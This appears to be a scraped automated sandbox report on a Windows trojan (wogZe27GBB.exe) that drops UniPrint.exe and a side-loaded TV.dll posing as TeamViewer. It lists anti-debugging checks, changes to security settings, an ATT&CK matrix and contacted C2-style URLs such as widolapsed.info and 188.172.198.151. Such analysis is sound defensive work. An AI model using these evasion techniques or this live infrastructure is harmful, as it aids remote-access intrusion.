Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_004FFF684_2_004FFF68
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: __EH_prolog3,GetAdaptersInfo,_malloc,GetAdaptersInfo,4_2_004B9A29
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetAdaptersInfo,4_2_709888E0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E61 FindFirstFileA,FindClose,0_2_00405E61
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_0040548B CloseHandle,DeleteFileA,lstrcat,lstrcat,lstrlen,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_0040548B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,2_2_70982EF0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,2_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982960 RtlZeroMemory,RtlZeroMemory,StrChrW,StrChrW,wsprintfW,wsprintfW,StrChrW,wsprintfW,FindFirstFileW,lstrcmpW,StrChrW,lstrcmpW,StrChrW,lstrcmpW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,4_2_70982960
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_70982EF0 StrChrW,StrChrW,wsprintfW,wsprintfW,RtlZeroMemory,FindFirstFileW,StrChrW,wsprintfW,DeleteFileW,MoveFileExW,FindNextFileW,FindClose,4_2_70982EF0
Source: svchost.exe, 00000003.00000002.545837085.0000024FB0060000.00000004.00000001.sdmpBinary or memory string: "@Hyper-V RAW
Source: svchost.exe, 00000003.00000002.512388496.0000024FAA829000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`S
Source: svchost.exe, 00000003.00000002.543297207.0000024FB0048000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000003.444226762.00000000057D5000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000007.00000002.509995145.0000020167402000.00000004.00000001.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: svchost.exe, 00000007.00000002.511295701.0000020167428000.00000004.00000001.sdmp, svchost.exe, 00000009.00000002.512367598.0000026C67243000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.512172229.000001563502A000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

barindex
Tries to detect sandboxes and other dynamic analysis tools (window names)Show sources
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeOpen window title or class name: ollydbg
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0053496B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B420 NtQuerySystemInformation,VirtualAlloc,NtQuerySystemInformation,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,VirtualFree,2_2_7098B420
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00405E88
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_7098B890 FreeLibrary,GetProcessHeap,HeapFree,HeapDestroy,2_2_7098B890
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0051523A _raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_0051523A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_0053496B _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_0053496B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00534A9B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00534A9B

HIPS / PFW / Operating System Protection Evasion:

barindex
DLL side loading technique detectedShow sources
Source: C:\Windows\SysWOW64\svchost.exeSection loaded: C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709854A0 LogonUserW,GetLastError,CloseHandle,2_2_709854A0
Source: C:\Users\user\Desktop\wogZe27GBB.exeProcess created: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe 'C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe' fJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_709834E0 OpenProcessToken,HeapAlloc,GetTokenInformation,GetTokenInformation,GetLastError,GetProcessHeap,GetProcessHeap,GetProcessHeap,HeapAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,ConvertSidToStringSidW,FreeSid,GetProcessHeap,HeapFree,CloseHandle,2_2_709834E0
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmpBinary or memory string: Progman
Source: UniPrint.exe, 00000004.00000003.303052348.00000000057D5000.00000004.00000001.sdmpBinary or memory string: Program ManagerX
Source: UniPrint.exe, 00000004.00000002.528609535.0000000001280000.00000002.00020000.sdmp, svchost.exe, 00000008.00000002.515777614.000001D30BF90000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: UniPrint.exe, 00000004.00000003.481410319.00000000057D5000.00000004.00000001.sdmpBinary or memory string: Program Manager4
Source: UniPrint.exe, 00000014.00000000.364825384.0000000000733000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWndThumbnailClassDV2ControlHostBaseBarTeamViewer_TitleBarWindowProgmanTVWidgetWin#32771teamviewerdebug.exeteamviewer.exeQuick Connect ButtonStartmenuTaskbarDesktopsidebar.exe\VarFileInfo\Translation\StringFileInfo\%04x%04x\FileDescription.exeOther applicationsSideBar_HTMLHostWindowSideBar_AppBarBulletBasicWindowTVWhiteboardOverlayWindowButtonEnableApplicationSelection: %1% (..\Server\WindowOberserver.cpp, 720)SelectAllWindows: %1%;%2% (..\Server\WindowOberserver.cpp, 751)SetSingleWindow (..\Server\WindowOberserver.cpp, 820)SessionEnded: %1% (..\Server\WindowOberserver.cpp, 827)SessionStart: %1%; type: %2% (..\Server\WindowOberserver.cpp, 910)HandleDesktopChanged: %1% (..\Server\WindowOberserver.cpp, 1017)Winlogonmap/set<T> too long
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,2_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,_xtoa_s@20,4_2_0054113A
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,4_2_0054E79D
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _LcidFromHexString,GetLocaleInfoA,4_2_0054E87F
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,4_2_0054E915
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: GetLocaleInfoA,4_2_0054D9D0
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_0054E987
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_0054EB57
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0054EC7B
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_0054EC16
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s,4_2_0054ECB7
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: RtlZeroMemory,VirtualAlloc,RtlZeroMemory,GetLocaleInfoW,CharLowerW,RtlZeroMemory,RtlGetNtVersionNumbers,RtlZeroMemory,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,RtlMoveMemory,GetProcessHeap,HeapFree,SetTimer,GetMessageW,StrChrW,KillTimer,RtlZeroMemory,StrChrW,wsprintfW,StrChrW,GetPrivateProfileStringW,RtlMoveMemory,GetProcessHeap,HeapFree,GetForegroundWindow,GetWindowTextW,RtlMoveMemory,GetProcessHeap,HeapFree,GetWindowThreadProcessId,NtOpenProcess,GetModuleFileNameExW,RtlMoveMemory,GetProcessHeap,HeapFree,NtClose,Sleep,GetDlgItemTextA,StrChrA,StrTrimA,GetDlgItemTextA,VirtualFree,WritePrivateProfileStringW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapAlloc,CreateThread,CloseHandle,Sleep,GetProcessHeap,HeapFree,RtlZeroMemory,GetSystemTimeAsFileTime,RtlTimeToSecondsSince1970,GetPrivateProfileIntW,StrChrW,wsprintfW,WritePrivateProfileStringW,SetEvent,SetTimer,StrChrW,DispatchMessageW,GetMessageW,KillTimer,VirtualFree,4_2_70987240
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_0054B459 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0054B459
Source: C:\Users\user\Desktop\wogZe27GBB.exeCode function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDList,74E3A680,lstrcat,lstrlen,0_2_00405B88
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 2_2_70988AF0 EntryPoint,DisableThreadLibraryCalls,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetSystemDirectoryW,ExitProcess,PathAddBackslashW,PathAddBackslashW,GetProcessHeap,HeapAlloc,GetModuleFileNameW,GetProcessHeap,HeapAlloc,RtlMoveMemory,PathRemoveFileSpecW,PathAddBackslashW,SetCurrentDirectoryW,SHGetSpecialFolderPathW,PathAddBackslashW,StrChrW,lstrcatW,GetFileAttributesW,ExitProcess,GetProcessHeap,HeapAlloc,GetModuleFileNameW,PathFindFileNameW,RtlZeroMemory,RtlGetVersion,WTSGetActiveConsoleSessionId,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetUserNameW,WTSQuerySessionInformationW,GetProcessHeap,HeapAlloc,GetComputerNameExW,GetProcessHeap,HeapAlloc,StrChrW,StrChrW,StrChrW,StrChrW,wsprintfW,lstrlenW,GetCommandLineW,CommandLineToArgvW,CharLowerW,StrToIntW,LocalFree,RtlZeroMemory,GetPrivateProfileIntW,GetModuleHandleW,GetModuleHandleW,GetModuleHandleW,StrChrW,StrChrW,wsprintfW,wsprintfW,LoadLibraryW,ExitProcess,StrChrW,wsprintfW,LoadLibraryW,FindWindowW,FindWindowW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,wsprintfW,LoadLibraryW,StrChrW,StrChrW,wsprintfW,GetProcessHeap,HeapFree,LoadLibraryW,StrChrW,ExitProcess,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,WTSFreeMemory,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,GetProcessHeap,HeapFree,LocalFree,CloseHandle,CloseHandle,NtTerminateThread,CloseHandle,2_2_70988AF0

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Changes security center settings (notifications, updates, antivirus, firewall)Show sources
Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
Source: svchost.exe, 0000000E.00000002.512252539.0000015E8B440000.00000004.00000001.sdmpBinary or memory string: "@V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: svchost.exe, 0000000E.00000002.510953306.0000015E8B413000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exeCode function: 4_2_00511D6F __EH_prolog3_catch,_memset,_memset,socket,WSAGetLastError,htonl,inet_addr,htons,WSAGetLastError,bind,bind,WSAGetLastError,Sleep,bind,listen,WSAGetLastError,select,WSAGetLastError,getsockname,WSAGetLastError,Sleep,__WSAFDIsSet,accept,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,WSAGetLastError,Sleep,GetTickCount,__WSAFDIsSet,WSAGetLastError,_strncmp,_strncmp,_strncpy,shutdown,Sleep,listen,Sleep,listen,WSAGetLastError,accept,Sleep,_memset,WSAGetLastError,_memset,select,_strncmp,4_2_00511D6F

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts2Windows Management Instrumentation111DLL Side-Loading11DLL Side-Loading11Disable or Modify Tools1Input Capture1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
Default AccountsNative API1DLL Search Order Hijacking2DLL Search Order Hijacking2Deobfuscate/Decode Files or Information1LSASS MemoryAccount Discovery1Remote Desktop ProtocolScreen Capture1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsService Execution12Create Account1Valid Accounts2Obfuscated Files or Information2Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesInput Capture1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Valid Accounts2Access Token Manipulation21Software Packing1NTDSSystem Information Discovery36Distributed Component Object ModelClipboard Data1Scheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronWindows Service22Windows Service22DLL Side-Loading11LSA SecretsQuery Registry1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRegistry Run Keys / Startup Folder1Process Injection12DLL Search Order Hijacking2Cached Domain CredentialsSecurity Software Discovery371VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsRegistry Run Keys / Startup Folder1Masquerading11DCSyncVirtualization/Sandbox Evasion12Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobValid Accounts2Proc FilesystemProcess Discovery2Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Virtualization/Sandbox Evasion12/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Access Token Manipulation21Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronProcess Injection12Input CaptureSystem Network Configuration Discovery1Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
wogZe27GBB.exe9%MetadefenderBrowse
wogZe27GBB.exe71%ReversingLabsWin32.Worm.AutoRun

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll6%MetadefenderBrowse
C:\Users\user\AppData\Roaming\ViberPC\Icons\TV.dll51%ReversingLabsWin32.Trojan.Phonzy
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\ViberPC\Icons\Teamviewer_Resource_ja.dll0%ReversingLabs
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe0%MetadefenderBrowse
C:\Users\user\AppData\Roaming\ViberPC\Icons\UniPrint.exe0%ReversingLabs

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
0.2.wogZe27GBB.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
0.0.wogZe27GBB.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://widolapsed.info/apsed.info/s/StoreAppName0%Avira URL Cloudsafe
http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGate0%Avira URL Cloudsafe
http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGated0%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/B8C631A8/soft.Microsoft3DVi0%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/B8C631A8/ources/DisplayNamev0%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/tral_neutral_cw5n1h2txyewy?0%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/0%Avira URL Cloudsafe
http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=100000010%Avira URL Cloudsafe
http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=100000020%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/e0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/esources/StoreAppN0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/80%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/90%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/ackageDisplayName0%Avira URL Cloudsafe
http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/pName0%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/8C631A8/90%Avira URL Cloudsafe
https://widolapsed.info/2i0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/lopmentPropertiesl0%Avira URL Cloudsafe
https://widolapsed.info/a0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/90%Avira URL Cloudsafe
https://widolapsed.info/0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/lopmentPropertiesh0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/esources/StoreAppN0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/d.info/B8C631A8/0%Avira URL Cloudsafe
https://widolapsed.info/3DViewer_2.1803.8022.0_x64_0%Avira URL Cloudsafe
http://crl.ver)0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s0%URL Reputationsafe
http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001v0%Avira URL Cloudsafe
https://widolapsed.info/ervice0%Avira URL Cloudsafe
https://widolapsed.info/i0%Avira URL Cloudsafe
https://%s.xboxlive.com0%URL Reputationsafe
https://widolapsed.info/apsed.info/ameCallableUI/resources/Pkg0%Avira URL Cloudsafe
https://widolapsed.info/vider/Resources/DisplayNamev0%Avira URL Cloudsafe
http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002l0%Avira URL Cloudsafe
https://widolapsed.info/64__8wekyb3d8bbwe?ms-resource://Microso0%Avira URL Cloudsafe
https://widolapsed.info/~0%Avira URL Cloudsafe
https://dynamic.t0%URL Reputationsafe
https://widolapsed.info/B8C631A8/resource://Microso0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/ources/DisplayNamev0%Avira URL Cloudsafe
https://widolapsed.info/-resource://Microsoft.Microsoft3DViewer40%Avira URL Cloudsafe
http://188.172.198.151/client=DynGate&rnd=78504903&p=100000010%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/ources/DisplayNamev0%Avira URL Cloudsafe
http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/resource://Microso0%Avira URL Cloudsafe
https://widolapsed.info/B8C631A8/leUI/resources/Pkg0%Avira URL Cloudsafe
https://widolapsed.info/8C631A8/al_cw5n1h2txyewy?m00%Avira URL Cloudsafe
https://widolapsed.info/apsed.info/3DViewer_2.1803.8022.0_x64_0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://widolapsed.info/apsed.info/B8C631A8/lopmentPropertiesh0%Avira URL Cloudsafe
http://188.172.198.151/0%Avira URL Cloudsafe
https://widolapsed.info/10%Avira URL Cloudsafe
https://widolapsed.info/s/StoreAppName0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
master12.teamviewer.com
185.188.32.22
truefalse
    		high
    widolapsed.info
    		45.153.241.148
    		truefalse
      		high
      ping3.dyngate.com
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://188.172.198.151/dout.aspx?s=12418339&p=10000002&client=DynGatefalse
        • Avira URL Cloud: safe
        		unknown
        http://master12.teamviewer.com/dout.aspx?s=40082849&p=10000001&client=DynGate&data=FyQSawCjHqkys5MkoZ6aGJqbGZocGBMkoh6YEyagoZ6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyakoh6YPDKxsxoxMRizMZqcGy+Ym5wYGpuYGRsbkyepnqu0txmXGJiTKx6YmpcYFxscG5AoqQ==false
          		high
          http://188.172.198.151/din.aspx?s=00000000&m=fast&client=DynGate&rnd=78504903&p=10000001false
          • Avira URL Cloud: safe
          		unknown
          http://188.172.198.151/din.aspx?s=12418339&m=fast&client=DynGate&p=10000002false
          • Avira URL Cloud: safe
          		unknown
          http://master12.teamviewer.com/din.aspx?s=40082864&client=DynGate&p=10000002false
            		high
